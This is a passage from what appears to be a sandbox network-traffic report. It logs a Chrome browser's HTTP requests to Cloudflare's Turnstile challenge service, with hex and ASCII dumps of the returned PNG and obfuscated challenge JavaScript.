                                                                                                Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                                Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.549735104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:14 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:14 UTC240INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:14 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 61
                                                                                                Connection: close
                                                                                                cache-control: max-age=2629800, public
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4ddee964316-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:14 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.2.549736104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:14 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8feca4d8fcf5c334&lang=auto HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: script
                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:15 UTC331INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:14 GMT
                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                Content-Length: 114346
                                                                                                Connection: close
                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4e16a1f7291-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:15 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69
                                                                                                Data Ascii: 0challenge","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","invalid_domain":"Invalid%20domai
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 67 32 2c 67 33 2c 67 64 2c 67 6f 2c 67 73 2c 67 43 2c 67 47 2c 67 48 2c 65 56 2c 65 57 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 34 37 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 32 37 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 30 38 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 38 36 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 36 36 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 31 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 36 37 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37
                                                                                                Data Ascii: g2,g3,gd,go,gs,gC,gG,gH,eV,eW){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(647))/1*(parseInt(gI(1027))/2)+-parseInt(gI(808))/3*(parseInt(gI(1586))/4)+parseInt(gI(766))/5+-parseInt(gI(511))/6*(parseInt(gI(567))/7)+parseInt(gI(7
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 32 31 39 29 5d 3d 3d 3d 6f 5b 67 51 28 39 31 39 29 5d 29 7b 66 6f 72 28 4b 3d 67 51 28 31 37 35 34 29 5b 67 51 28 31 32 34 32 29 5d 28 27 7c 27 29 2c 4c 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4b 5b 4c 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 43 3d 21 21 5b 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 47 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 48 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 48 5b 67 51 28 36 38 30 29 5d 28 4c 5b 67 51 28 37 31 30 29 5d 5b 67 51 28 31 32 32 39 29 5d 2c 30 29 26 26 28 56 3d 57 5b 67 51 28 31 36 31 30 29 5d 28 58 2c 59 5b 67 51 28 37 31 30 29 5d 5b 67 51 28 31 32 32 39 29 5d 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 46 28 29 3b 63 6f 6e 74 69 6e 75 65
                                                                                                Data Ascii: 219)]===o[gQ(919)]){for(K=gQ(1754)[gQ(1242)]('|'),L=0;!![];){switch(K[L++]){case'0':C=!![];continue;case'1':G();continue;case'2':H();continue;case'3':H[gQ(680)](L[gQ(710)][gQ(1229)],0)&&(V=W[gQ(1610)](X,Y[gQ(710)][gQ(1229)]));continue;case'4':F();continue
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 5b 6d 5d 29 29 2c 6d 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b 6c 5d 3d 68 5b 6a 5b 6b 5d 5d 5b 67 52 28 35 39 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 6e 7d 29 7d 2c 65 56 3d 5b 5d 2c 65 57 3d 30 3b 32 35 36 3e 65 57 3b 65 56 5b 65 57 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 37 32 38 29 5d 28 65 57 29 2c 65 57 2b 2b 29 3b 67 48 3d 28 65 58 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 39 32 30 29 29 2c 65 59 3d 61 74 6f 62 28 67 4a 28 31 30 32 35 29 29 2c 65 4d 5b 67 4a 28 38 32 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 75 2c 64 2c 65 2c 66 2c 67 29 7b 68 75 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 68 75 28 31 37 32 32 29 5d 3d 68 75 28 31 34 37 34 29 2c 64 5b 68 75 28 35 33 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75
                                                                                                Data Ascii: [m])),m++);}else g[l]=h[j[k]][gR(592)](function(n){return'o.'+n})},eV=[],eW=0;256>eW;eV[eW]=String[gJ(728)](eW),eW++);gH=(eX=(0,eval)(gJ(920)),eY=atob(gJ(1025)),eM[gJ(821)]=function(hu,d,e,f,g){hu=gJ,d={},d[hu(1722)]=hu(1474),d[hu(534)]=function(h,i){retu
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 77 28 37 31 30 29 5d 5b 68 77 28 38 32 39 29 5d 2b 27 2f 27 3a 27 27 2c 6d 3d 69 5b 68 77 28 31 37 36 30 29 5d 28 69 5b 68 77 28 35 37 39 29 5d 28 69 5b 68 77 28 31 37 36 30 29 5d 28 69 5b 68 77 28 36 37 37 29 5d 2c 6c 29 2c 69 5b 68 77 28 31 32 39 32 29 5d 29 2b 31 2b 68 77 28 31 34 39 37 29 2b 65 4d 5b 68 77 28 37 31 30 29 5d 5b 68 77 28 31 31 30 37 29 5d 2b 27 2f 27 2b 65 4d 5b 68 77 28 37 31 30 29 5d 2e 63 48 2b 27 2f 27 2c 65 4d 5b 68 77 28 37 31 30 29 5d 5b 68 77 28 39 31 38 29 5d 29 2c 6e 3d 7b 7d 2c 6e 5b 68 77 28 31 34 31 39 29 5d 3d 65 4d 5b 68 77 28 37 31 30 29 5d 5b 68 77 28 31 34 31 39 29 5d 2c 6e 5b 68 77 28 34 36 38 29 5d 3d 65 4d 5b 68 77 28 37 31 30 29 5d 5b 68 77 28 34 36 38 29 5d 2c 6e 5b 68 77 28 35 33 32 29 5d 3d 65 4d 5b 68 77 28 37
                                                                                                Data Ascii: w(710)][hw(829)]+'/':'',m=i[hw(1760)](i[hw(579)](i[hw(1760)](i[hw(677)],l),i[hw(1292)])+1+hw(1497)+eM[hw(710)][hw(1107)]+'/'+eM[hw(710)].cH+'/',eM[hw(710)][hw(918)]),n={},n[hw(1419)]=eM[hw(710)][hw(1419)],n[hw(468)]=eM[hw(710)][hw(468)],n[hw(532)]=eM[hw(7
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 68 78 28 31 36 33 35 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 68 78 28 34 38 37 29 5d 3d 66 2c 6d 5b 68 78 28 31 31 39 34 29 5d 3d 67 2c 6d 5b 68 78 28 35 38 36 29 5d 3d 68 2c 6d 5b 68 78 28 34 37 32 29 5d 3d 69 2c 6d 5b 68 78 28 31 31 34 38 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4a 28 31 30 32 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 68 41 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 68 41 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 68 41 28 39 37 39 29 5d 3d 68 41 28 39 36 36 29 2c 6a 5b 68 41 28 39 35 39 29 5d 3d 68 41 28 31 30 39 37 29 2c 6b 3d 6a 2c 6c 3d 65 5b 68 41 28 31 35 36 32 29 5d 28 29 2c 6d 3d 6b 5b 68 41 28 39 35 39 29 5d 2c 6c 5b 68 41 28 36 39 38 29 5d 28 6d 29 3e 2d 31 29 3f 65 4d 5b 68 41 28 31 36 31 30
                                                                                                Data Ascii: hx(1635)](d);return m={},m[hx(487)]=f,m[hx(1194)]=g,m[hx(586)]=h,m[hx(472)]=i,m[hx(1148)]=d,m},eM[gJ(1020)]=function(e,f,g,h,i,hA,j,k,l,m,n,o){(hA=gJ,j={},j[hA(979)]=hA(966),j[hA(959)]=hA(1097),k=j,l=e[hA(1562)](),m=k[hA(959)],l[hA(698)](m)>-1)?eM[hA(1610
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 76 61 6c 28 67 31 29 7d 29 2c 67 33 3d 21 5b 5d 2c 21 66 75 28 67 4a 28 38 37 35 29 29 26 26 28 67 72 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 59 2c 63 2c 64 2c 65 29 7b 69 59 3d 67 4a 2c 63 3d 7b 27 62 41 6a 49 44 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3e 67 7d 2c 27 4a 49 50 4f 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 2c 27 44 48 58 4b 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 71 79 4f 6f 55 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 7d 2c 64 3d 65 4d 5b 69 59 28 37 31 30 29 5d 5b 69 59 28 34 37 33 29 5d 7c 7c 31 65 34 2c 65 3d 67 70 28 29 2c 21 65 4d 5b 69 59 28 31 31 31
                                                                                                Data Ascii: val(g1)}),g3=![],!fu(gJ(875))&&(gr(),setInterval(function(iY,c,d,e){iY=gJ,c={'bAjID':function(f,g){return f>g},'JIPOk':function(f,g){return f-g},'DHXKO':function(f){return f()},'qyOoU':function(f){return f()}},d=eM[iY(710)][iY(473)]||1e4,e=gp(),!eM[iY(111
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 6e 28 6a 44 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a 44 3d 67 4a 2c 64 3d 7b 27 69 7a 6d 61 43 27 3a 6a 44 28 31 37 30 38 29 2c 27 68 41 42 4a 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 46 4b 68 6a 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 41 59 42 72 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 5e 68 7d 2c 27 48 63 6b 57 4f 27 3a 6a 44 28 31 31 30 30 29 2c 27 72 4c 74 48 44 27 3a 6a 44 28 35 33 33 29 2c 27 55 6e 62 70 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 70 58 64 48 67 27 3a 6a 44 28 31 32 35 36 29 2c 27 64 7a 54 52 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c
                                                                                                Data Ascii: n(jD,d,e,f,g){return jD=gJ,d={'izmaC':jD(1708),'hABJD':function(h,i){return i==h},'FKhjo':function(h,i){return h+i},'AYBrZ':function(h,i){return i^h},'HckWO':jD(1100),'rLtHD':jD(533),'Unbph':function(h,i){return h===i},'pXdHg':jD(1256),'dzTRH':function(h,
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 33 29 5d 28 6a 29 7d 29 3b 65 6c 73 65 20 69 5b 6a 45 28 31 33 35 38 29 5d 28 65 2c 66 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 49 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 51 2c 52 29 7b 69 66 28 6a 49 3d 6a 44 2c 73 3d 7b 27 4d 49 65 54 46 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 6a 47 29 7b 72 65 74 75 72 6e 20 6a 47 3d 62 2c 64 5b 6a 47 28 31 37 31 32 29 5d 28 4f 2c 50 29 7d 2c 27 4f 7a 43 48 67 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 6a 48 29 7b 72 65 74 75 72 6e 20 6a 48 3d 62 2c 64 5b 6a 48 28 34 34 39 29 5d 28 4f 2c 50 29 7d 2c 27 63 55 44 41 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 3c 50 7d 2c 27 4f 4c 45 77 43 27 3a 66 75 6e
                                                                                                Data Ascii: 3)](j)});else i[jE(1358)](e,f)},'g':function(i,j,o,jI,s,x,B,C,D,E,F,G,H,I,J,K,L,M,N,Q,R){if(jI=jD,s={'MIeTF':function(O,P,jG){return jG=b,d[jG(1712)](O,P)},'OzCHg':function(O,P,jH){return jH=b,d[jH(449)](O,P)},'cUDAm':function(O,P){return O<P},'OLEwC':fun


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.2.549737104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:14 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:15 UTC240INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:15 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 61
                                                                                                Connection: close
                                                                                                cache-control: max-age=2629800, public
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4e1f9658c0c-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:15 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                13192.168.2.549738104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:15 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8feca4d8fcf5c334&lang=auto HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:15 UTC331INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:15 GMT
                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                Content-Length: 109048
                                                                                                Connection: close
                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4e71a8b78e7-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:15 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 30 70 65 72 73 69 73 74 73 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32
                                                                                                Data Ascii: 0persists.","human_button_text":"Verify%20you%20are%20human","turnstile_success":"Success%21","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 66 58 2c 67 34 2c 67 38 2c 67 39 2c 67 64 2c 67 65 2c 67 68 2c 67 69 2c 67 66 2c 67 67 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 38 34 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 34 37 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 31 30 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 31 36 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 32 39 34 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 37 36 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 37 31 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34
                                                                                                Data Ascii: fX,g4,g8,g9,gd,ge,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1184))/1+-parseInt(gI(347))/2*(parseInt(gI(1410))/3)+parseInt(gI(316))/4+parseInt(gI(294))/5*(-parseInt(gI(1176))/6)+parseInt(gI(771))/7+parseInt(gI(14
